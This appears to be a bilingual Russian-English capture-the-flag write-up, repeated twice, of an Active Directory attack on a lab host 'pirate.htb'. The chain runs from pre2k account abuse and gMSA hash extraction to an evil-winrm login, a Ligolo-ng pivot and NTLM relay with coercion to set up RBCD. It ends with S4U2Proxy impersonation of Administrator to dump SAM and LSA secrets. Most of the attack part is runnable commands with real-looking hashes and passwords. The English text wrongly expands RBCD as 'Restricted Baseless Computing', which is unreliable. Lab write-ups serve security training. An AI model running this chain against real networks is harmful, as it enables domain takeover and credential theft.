сверху представлен русский перевод а снизу представлен английский перевод/The Russian translation is shown above, and the English translation is shown below.
RU
В этом сценарии мы разбираем классическую цепочку эксплуатации современной
AD-среды: от поиска забытых учетных записей до использования сложных механизмов делегирования (RBCD) через NTLM Relay.
1. Initial Access (Pre2k Abuse)
Все началось с проверки домена на наличие «предварительно созданных» учетных записей компьютеров.
Модуль pre2k ищет аккаунты, пароли которых по умолчанию совпадают с их именем.
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -u pentest -p 'p3nt3st2025!&' -M pre2k
______________________________________________________
* Логика: Нашли MS01$ и EXCH01$. Эти аккаунты — не просто мусор, это полноценные участники домена.
Мы получили их TGT (.ccache), что позволило нам действовать от имени машины.
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
2. Lateral Movement (gMSA Abuse)
Учетная запись MS01$ оказалась членом группы Domain Secure Servers.
В AD это дает право читать защищенные пароли управляемых учетных записей (gMSA).
*экспортируем билет(команда ниже)
COMMAND
______________________________________________________
export KRB5CCNAME=/root/.nxc/modules/pre2k/ccache/ms01.ccache
______________________________________________________
*вытаскиваем gMSA хеши(команда ниже)
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -k —use-kcache --gmsa
______________________________________________________
* Логика: Используя Kerberos-билет машины, мы «попросили» LDAP отдать нам пароли gMSA.
* Результат: Получены NTLM-хеши gMSA_ADCS_prod$ и gMSA_ADFS_prod$.
_________________________________________________________________________________________________________________________________________
3. Pivoting via Ligolo-ng
После получения шелла и проверки конфигурации сети мы мы замечаем что целевой сервер WEB01 находился в другом сегменте(192.168.100.0/24).
Чтобы работать с ним напрямую, мы прокидываем туннель в сетку
* Зашли через evil-winrm под gMSA(команда ниже)
COMMAND
______________________________________________________
evil-winrm -i 10.129.7.135 -u gMSA_ADCS_prod$ -H '304106f739822ea2ad8ebe23f802d078'
______________________________________________________
* Загрузили и запустили agent.exe от Ligolo.
* На нашей стороне: sudo ip route add 192.168.100.0/24 dev ligolo.
* Логика: Без нормального туннеля мы бы не смогли провести Relay-атаку,
так как нам нужно, чтобы жертва видела наш порт 445 напрямую.
_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
4.NTLM Relay & RBCD
После пивотинга сканирование внутрянки показало, что на WEB01 отключена подпись SMB (signing: False).
Это позволило нам принудительно заставить сервер аутентифицироваться на нас и переслать его данные на контроллер домена.
Шаг 1 (Relay):
COMMAND
______________________________________________________
impacket-ntlmrelayx -t ldap://192.168.100.1 --remove-mic --delegate-access
______________________________________________________
Шаг 2 (Coercion):
COMMAND
______________________________________________________
nxc smb 192.168.100.2 -u gMSA_ADFS_prod$ -H '8126756fb2e69697bfcb04816e685839' -M coerce_plus -o LISTENER=10.10.15.32
______________________________________________________
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
5. S4U2Proxy Impersonation
Имея подконтрольный компьютер с правами делегирования,
мы просто запрашиваем доступ к WEB01 от имени Администратора и дампим хеши SAM/LSA.
COMMAND
______________________________________________________
nxc smb web01.pirate.htb -u 'AMXODWFY$' -p 'V/qHM;P.n)GA}H3' --delegate Administrator --lsa --sam
______________________________________________________
* Логика: Атака S4U2Proxy позволяет нашей учетке AMXODWFY$
получить сервис-тикет для любого пользователя. Мы выбрали Administrator.
* Итог: Сдамплены все секреты WEB01, включая хеши и LSA-секреты.
очень реалистичный чейн вышел, пропивотились по славянски и дампнули бдшку через делегацию.
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
EU
In this context, we examine the classic exploitation chain of modern AD environments:
from identifying forgotten accounts to using the Restricted Baseless Computing (RBCD) principle via NTLM Relay.
1. Initial Access (Pre2k Abuse)
It all started with a domain scan for "pre-created" computer accounts.
The pre2k module searches for accounts whose default passwords match their usernames.
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -u pentest -p 'p3nt3st2025!&' -M pre2k
______________________________________________________
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
2. Lateral Movement (gMSA Abuse)
The MS01$ account was found to be a member of the Domain Secure Servers group.
In AD, this grants permission to read secure passwords for managed accounts (gMSA).
*exporting the ticket
COMMAND
______________________________________________________
export KRB5CCNAME=/root/.nxc/modules/pre2k/ccache/ms01.ccache
______________________________________________________
*extract gMSA hashes
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -k —use-kcache --gmsa
____________________________________________________
* Logic: Using the machine's Kerberos ticket, we "asked" LDAP to give us the gMSA passwords.
* Result: NTLM hashes of gMSA_ADCS_prod$ and gMSA_ADFS_prod$ were obtained.
3. Pivoting via Ligolo-ng
After obtaining the shell and checking the network configuration,
we noticed that the target server, WEB01, was on a different segment (192.168.100.0/24).
To access it directly, we tunnel into the network.
* Logged in via evil-winrm under gMSA:
COMMAND
______________________________________________________
evil-winrm -i 10.129.7.135 -u gMSA_ADCS_prod$ -H '304106f739822ea2ad8ebe23f802d078'
______________________________________________________
* Downloaded and ran Ligolo's agent.exe.
* On our side: sudo ip route add 192.168.100.0/24 dev ligolo.
* Logic: Without a proper tunnel, we wouldn't be able to perform a Relay attack, since we need the victim to see our port 445 directly.
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
4.NTLM Relay & RBCD
After pivoting, an internal scan revealed that SMB signing was disabled on WEB01 (signing: False).
This allowed us to force the server to authenticate with us and forward its data to the domain controller.
step1 (Relay):
COMMAND
______________________________________________________
impacket-ntlmrelayx -t ldap://192.168.100.1 --remove-mic --delegate-access
______________________________________________________
step2 (Coercion):
COMMAND
______________________________________________________
nxc smb 192.168.100.2 -u gMSA_ADFS_prod$ -H '8126756fb2e69697bfcb04816e685839' -M coerce_plus -o LISTENER=10.10.15.32
______________________________________________________
* Logic: Using the nxc coerce_plus module, we forced WEB01$ to contact our ntlmrelayx. The relay intercepted the session and configured Resource-Based Constrained Delegation via LDAP.
* Result: The AMXODWFY$ account was created, granting it the right to impersonate anyone in front of the WEB01 server.
5. S4U2Proxy Impersonation
COMMAND
______________________________________________________
nxc smb web01.pirate.htb -u 'AMXODWFY$' -p 'V/qHM;P.n)GA}H3' --delegate Administrator --lsa --sam
______________________________________________________
Logic: The S4U2Proxy attack allows our AMXODWFY$ account to obtain a service ticket for any user. We selected Administrator.
* Result: All WEB01 secrets were dumped, including hashes and LSA secrets.
RU
В этом сценарии мы разбираем классическую цепочку эксплуатации современной
AD-среды: от поиска забытых учетных записей до использования сложных механизмов делегирования (RBCD) через NTLM Relay.
1. Initial Access (Pre2k Abuse)
Все началось с проверки домена на наличие «предварительно созданных» учетных записей компьютеров.
Модуль pre2k ищет аккаунты, пароли которых по умолчанию совпадают с их именем.
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -u pentest -p 'p3nt3st2025!&' -M pre2k
______________________________________________________
* Логика: Нашли MS01$ и EXCH01$. Эти аккаунты — не просто мусор, это полноценные участники домена.
Мы получили их TGT (.ccache), что позволило нам действовать от имени машины.
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
2. Lateral Movement (gMSA Abuse)
Учетная запись MS01$ оказалась членом группы Domain Secure Servers.
В AD это дает право читать защищенные пароли управляемых учетных записей (gMSA).
*экспортируем билет(команда ниже)
COMMAND
______________________________________________________
export KRB5CCNAME=/root/.nxc/modules/pre2k/ccache/ms01.ccache
______________________________________________________
*вытаскиваем gMSA хеши(команда ниже)
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -k —use-kcache --gmsa
______________________________________________________
* Логика: Используя Kerberos-билет машины, мы «попросили» LDAP отдать нам пароли gMSA.
* Результат: Получены NTLM-хеши gMSA_ADCS_prod$ и gMSA_ADFS_prod$.
_________________________________________________________________________________________________________________________________________
3. Pivoting via Ligolo-ng
После получения шелла и проверки конфигурации сети мы мы замечаем что целевой сервер WEB01 находился в другом сегменте(192.168.100.0/24).
Чтобы работать с ним напрямую, мы прокидываем туннель в сетку
* Зашли через evil-winrm под gMSA(команда ниже)
COMMAND
______________________________________________________
evil-winrm -i 10.129.7.135 -u gMSA_ADCS_prod$ -H '304106f739822ea2ad8ebe23f802d078'
______________________________________________________
* Загрузили и запустили agent.exe от Ligolo.
* На нашей стороне: sudo ip route add 192.168.100.0/24 dev ligolo.
* Логика: Без нормального туннеля мы бы не смогли провести Relay-атаку,
так как нам нужно, чтобы жертва видела наш порт 445 напрямую.
_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
4.NTLM Relay & RBCD
После пивотинга сканирование внутрянки показало, что на WEB01 отключена подпись SMB (signing: False).
Это позволило нам принудительно заставить сервер аутентифицироваться на нас и переслать его данные на контроллер домена.
Шаг 1 (Relay):
COMMAND
______________________________________________________
impacket-ntlmrelayx -t ldap://192.168.100.1 --remove-mic --delegate-access
______________________________________________________
Шаг 2 (Coercion):
COMMAND
______________________________________________________
nxc smb 192.168.100.2 -u gMSA_ADFS_prod$ -H '8126756fb2e69697bfcb04816e685839' -M coerce_plus -o LISTENER=10.10.15.32
______________________________________________________
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
5. S4U2Proxy ImpersonationИмея подконтрольный компьютер с правами делегирования,
мы просто запрашиваем доступ к WEB01 от имени Администратора и дампим хеши SAM/LSA.
COMMAND
______________________________________________________
nxc smb web01.pirate.htb -u 'AMXODWFY$' -p 'V/qHM;P.n)GA}H3' --delegate Administrator --lsa --sam
______________________________________________________
* Логика: Атака S4U2Proxy позволяет нашей учетке AMXODWFY$
получить сервис-тикет для любого пользователя. Мы выбрали Administrator.
* Итог: Сдамплены все секреты WEB01, включая хеши и LSA-секреты.
очень реалистичный чейн вышел, пропивотились по славянски и дампнули бдшку через делегацию.
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
EU
In this context, we examine the classic exploitation chain of modern AD environments:
from identifying forgotten accounts to using the Restricted Baseless Computing (RBCD) principle via NTLM Relay.
1. Initial Access (Pre2k Abuse)
It all started with a domain scan for "pre-created" computer accounts.
The pre2k module searches for accounts whose default passwords match their usernames.
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -u pentest -p 'p3nt3st2025!&' -M pre2k
______________________________________________________
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
2. Lateral Movement (gMSA Abuse)
The MS01$ account was found to be a member of the Domain Secure Servers group.
In AD, this grants permission to read secure passwords for managed accounts (gMSA).
*exporting the ticket
COMMAND
______________________________________________________
export KRB5CCNAME=/root/.nxc/modules/pre2k/ccache/ms01.ccache
______________________________________________________
*extract gMSA hashes
COMMAND
______________________________________________________
nxc ldap 10.129.7.135 -k —use-kcache --gmsa
____________________________________________________
* Logic: Using the machine's Kerberos ticket, we "asked" LDAP to give us the gMSA passwords.
* Result: NTLM hashes of gMSA_ADCS_prod$ and gMSA_ADFS_prod$ were obtained.
3. Pivoting via Ligolo-ng
After obtaining the shell and checking the network configuration,
we noticed that the target server, WEB01, was on a different segment (192.168.100.0/24).
To access it directly, we tunnel into the network.
* Logged in via evil-winrm under gMSA:
COMMAND
______________________________________________________
evil-winrm -i 10.129.7.135 -u gMSA_ADCS_prod$ -H '304106f739822ea2ad8ebe23f802d078'
______________________________________________________
* Downloaded and ran Ligolo's agent.exe.
* On our side: sudo ip route add 192.168.100.0/24 dev ligolo.
* Logic: Without a proper tunnel, we wouldn't be able to perform a Relay attack, since we need the victim to see our port 445 directly.
__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
4.NTLM Relay & RBCD
After pivoting, an internal scan revealed that SMB signing was disabled on WEB01 (signing: False).
This allowed us to force the server to authenticate with us and forward its data to the domain controller.
step1 (Relay):
COMMAND
______________________________________________________
impacket-ntlmrelayx -t ldap://192.168.100.1 --remove-mic --delegate-access
______________________________________________________
step2 (Coercion):
COMMAND
______________________________________________________
nxc smb 192.168.100.2 -u gMSA_ADFS_prod$ -H '8126756fb2e69697bfcb04816e685839' -M coerce_plus -o LISTENER=10.10.15.32
______________________________________________________
* Logic: Using the nxc coerce_plus module, we forced WEB01$ to contact our ntlmrelayx. The relay intercepted the session and configured Resource-Based Constrained Delegation via LDAP.
* Result: The AMXODWFY$ account was created, granting it the right to impersonate anyone in front of the WEB01 server.
5. S4U2Proxy Impersonation
COMMAND
______________________________________________________
nxc smb web01.pirate.htb -u 'AMXODWFY$' -p 'V/qHM;P.n)GA}H3' --delegate Administrator --lsa --sam
______________________________________________________
Logic: The S4U2Proxy attack allows our AMXODWFY$ account to obtain a service ticket for any user. We selected Administrator.
* Result: All WEB01 secrets were dumped, including hashes and LSA secrets.
